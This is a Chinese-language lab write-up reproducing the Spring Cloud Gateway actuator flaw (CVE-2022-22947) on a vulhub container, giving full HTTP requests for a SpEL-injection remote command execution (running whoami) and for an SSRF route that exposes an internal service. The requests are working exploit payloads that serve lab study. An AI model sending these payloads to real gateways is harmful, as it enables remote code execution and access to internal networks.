Spring Cloud Gateway RCE和SSRF映射内网

环境搭建

直接用vulhub的环境：

docker pull vulhub/spring-cloud-gateway:3.1.0

docker-compose up -d

RCE

添加过滤器（POST）

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.1.247:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947+gzip"
Priority: u=0, i
Content-Type: application/json
Content-Length: 329

{
  "id": "test",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

响应码是201就对了
刷新过滤器（POST）

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.1.247:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

访问过滤器ID（GET）
http://192.168.1.247:8080/actuator/gateway/routes/test

SSRF

映射内网: 这里在物理机开了一个python的监听服务:
http://192.168.1.247:8888/

POST /actuator/gateway/routes/evil HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=OM3FxDI0M4njXhH0zVNJtCGRfdK3yRmZINRnazGlPHBJ7gXQ1SgmGh9AofjMsomi; rememberMe=UbyG+puy2EL1Yunmn7gz8Ymrg5p9w6q7bHzTbk+SIDR13mgYzmv/iMmA9RylIE3rgt3FG3FkXIU54cNvsefZxuPV9YU0Tp+vnbtt2VlmSIxV55FVb7PvDJ3aPIz7EF2A5tXeQ2bx+sEFDuTPKFVhRjtrblyBX/OrrbRG5MSURTWGQVDpZlvJ5bJ1jf2JAy5yCLmk9mrUzqaEmaRDKi2oFzNd9jV9qIz2yeVtZ3jJsIX2ZlKr4tVGBxK+gA3ldAnj/G5P/iU8RltCVWusuXOvhZJfwQjBtJeSTaj9PN0W1mu5fbJdY2qiTwgdpGfOeUxZZXG5sqaFRxSKuE7NpgHi74UoVR+BUg3tazhqL40MzQ3sKcz8BT3H7uftxDvr7JNC2jGXOy4dhFRM4ph+LPp1XhcwSP1V1I8wwacat7wks877f29ZYzp9nyEGqMndzKC/XUSJ8UIIsb574B+p2wltNzTSbuxgnVu/QFVVkx33fQPd8qfEh5AYrfI62zgj77Ql; _ga_0WLTHS96P4=GS1.1.1712136317.1.1.1712136329.0.0.0; _ga=GA1.1.737516964.1712136317; CactiDateTime=Tue Jul 16 2024 16:24:46 GMT+0800 (中国标准时间); CactiTimeZone=480; _ga_P1E9Z5LRRK=GS1.1.1725342668.1.0.1725343017.0.0.0; cookie_token=cc04b17c8e9948cd4ae7e5a62e6aaab84e806df77a171b2d761526e2f0b07537; Drupal.toolbar.collapsed=0; wp-settings-time-1=1734415947
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json
Content-Length: 348

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/evil/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "/evil/(?<path>.*)",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "http://192.168.1.247:8888/",
  "order": -1
}

出现201即成功

刷新配置:

POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=OM3FxDI0M4njXhH0zVNJtCGRfdK3yRmZINRnazGlPHBJ7gXQ1SgmGh9AofjMsomi; rememberMe=UbyG+puy2EL1Yunmn7gz8Ymrg5p9w6q7bHzTbk+SIDR13mgYzmv/iMmA9RylIE3rgt3FG3FkXIU54cNvsefZxuPV9YU0Tp+vnbtt2VlmSIxV55FVb7PvDJ3aPIz7EF2A5tXeQ2bx+sEFDuTPKFVhRjtrblyBX/OrrbRG5MSURTWGQVDpZlvJ5bJ1jf2JAy5yCLmk9mrUzqaEmaRDKi2oFzNd9jV9qIz2yeVtZ3jJsIX2ZlKr4tVGBxK+gA3ldAnj/G5P/iU8RltCVWusuXOvhZJfwQjBtJeSTaj9PN0W1mu5fbJdY2qiTwgdpGfOeUxZZXG5sqaFRxSKuE7NpgHi74UoVR+BUg3tazhqL40MzQ3sKcz8BT3H7uftxDvr7JNC2jGXOy4dhFRM4ph+LPp1XhcwSP1V1I8wwacat7wks877f29ZYzp9nyEGqMndzKC/XUSJ8UIIsb574B+p2wltNzTSbuxgnVu/QFVVkx33fQPd8qfEh5AYrfI62zgj77Ql; _ga_0WLTHS96P4=GS1.1.1712136317.1.1.1712136329.0.0.0; _ga=GA1.1.737516964.1712136317; CactiDateTime=Tue Jul 16 2024 16:24:46 GMT+0800 (中国标准时间); CactiTimeZone=480; _ga_P1E9Z5LRRK=GS1.1.1725342668.1.0.1725343017.0.0.0; cookie_token=cc04b17c8e9948cd4ae7e5a62e6aaab84e806df77a171b2d761526e2f0b07537; Drupal.toolbar.collapsed=0; wp-settings-time-1=1734415947
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json
Content-Length: 233

{
  "predicate": "Paths: [/evil], match trailing slash: true",
  "route_id": "new_route",
  "filters": [
    "[[RewritePath /evil(?<path>.*) = /${path}], order = 1]"
  ],
  "uri": "http://192.168.1.247:8888/",
  "order": -1
}

返回200即成功

访问/actuator/gateway/routes可以发现新加的路由

我们把order设置为-1,因此在最上面
访问python内网服务: http://127.0.0.1:8080/evil/

![[Pasted image 20250103231534.png]]

可以看到成功出现内网文件信息

参考

• https://github.com/vulhub/vulhub/tree/178719be6744a620ff0de125353789288657c2dd/spring/CVE-2022-22947
• https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/